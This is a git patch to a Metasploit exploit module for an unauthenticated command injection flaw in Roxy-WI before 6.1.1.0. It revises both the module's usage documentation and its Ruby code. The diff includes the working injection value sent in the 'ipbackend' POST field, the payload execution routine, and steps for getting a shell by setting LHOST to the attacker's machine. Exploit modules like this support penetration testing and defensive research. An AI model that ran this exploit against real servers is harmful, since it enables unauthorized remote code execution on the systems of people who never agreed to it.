From fc3b08fb8b97539d016878eb774df28362c444e3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Nuri=20=C3=87ilengir?=
 <44322086+ncilengir@users.noreply.github.com>
Date: Fri, 22 Jul 2022 12:51:40 +0000
Subject: [PATCH] Apply suggestions from code review

Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
---
 .../exploit/linux/http/roxy_wi_exec.md        |  9 +++--
 modules/exploits/linux/http/roxy_wi_exec.rb   | 33 ++++++++-----------
 2 files changed, 17 insertions(+), 25 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/roxy_wi_exec.md b/documentation/modules/exploit/linux/http/roxy_wi_exec.md
index b8d60f1074..8163fd7276 100644
--- a/documentation/modules/exploit/linux/http/roxy_wi_exec.md
+++ b/documentation/modules/exploit/linux/http/roxy_wi_exec.md
@@ -10,7 +10,7 @@ Successful exploitation results in remote code execution under the context of th
 
 Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
 
-[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)
+https://roxy-wi.org/installation.py#manual
 
 ```
 git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
@@ -24,12 +24,11 @@ chown -R www-data:www-data haproxy-wi
 1. Install the application
 2. Start msfconsole
 3. Do: `use exploit/linux/http/roxy_wi_exec`
-4. Set `RHOST`
-5. Set `LHOST`
+4. Set `RHOST` to the address of the target Roxy-WI machine.
+5. Set `LHOST` to the address of your attacking machine.
 8. Run `exploit`
 9. Do: `run`
-10. You should get a shell.
-11. **Verify** that you are getting meterpreter session.
+10. You should get a shell as the user running the Roxy-WI server.
 
 ## Options
 Set `TAGETURI` if the Roxy-WI is installed at a custom path.
diff --git a/modules/exploits/linux/http/roxy_wi_exec.rb b/modules/exploits/linux/http/roxy_wi_exec.rb
index 0c9e9dfc8e..4dd930711b 100644
--- a/modules/exploits/linux/http/roxy_wi_exec.rb
+++ b/modules/exploits/linux/http/roxy_wi_exec.rb
@@ -14,20 +14,17 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Roxy-WI Unauthenticated Remote Code Execution',
+        'Name' => 'Roxy-WI < 6.1.1.0 Unauthenticated Command Injection RCE',  
         'Description' => %q{
-          This module exploits command injection vulnerability to achieve remote code execution.
-          Unauthenticated users can execute a terminal command under the context of the web server user.
-
-          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. In versions 6.1.1.0 and earlier,
-          an unauthenticated user can execute some methods of administrator functions without needing any credentials.
-          Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account,
-          existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes,
-          or execute operating system command under the context of the web-server user.
+          This module exploits an unauthenticated command injection vulnerability in Roxy-WI 
+          prior to version 6.1.1.0.  Successful exploitation results in remote code execution 
+          under the context of the web server user.
+          
+          Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Nuri Çilengir <nuri@prodaft.com>' # Author & Metasploit module
+          'Nuri Çilengir <nuri[at]prodaft.com>' # Author & Metasploit module
         ],
         'References' => [
           ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory
@@ -67,14 +64,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, 'app', 'options.py'),
         'vars_post' => {
           'serv' => '127.0.0.1',
-          'ipbackend' => "poc\"; #{cmd} ;#",
+          'ipbackend' => "\"; #{cmd} ;#",
           'alert_consumer' => Rex::Text.rand_text_alpha_lower(7),
           'backend_server' => '127.0.0.1'
         }
       }, 10
     )
   rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
-    fail_with(Failure::Unknown, "#{peer} - Something went wrong!")
+    fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
   end
 
   def check
@@ -97,14 +94,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status 'Trying to detect command injection vulnerability.'
 
     begin
-      if target['Arch'] == ARCH_PYTHON
-        execute_command("python3 -c \"#{payload.encoded}\"")
-      else
-        execute_command(payload.encoded)
-      end
-    rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
-      fail_with(Failure::Unknown, 'Something went wrong!')
-    else
+      execute_command(payload.encoded)
+  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
+    fail_with(Failure::Unreachable, "Couldn't connect to #{peer}, check your connection!")
+  else
       print_good('Exploit successfully executed.')
     end
   end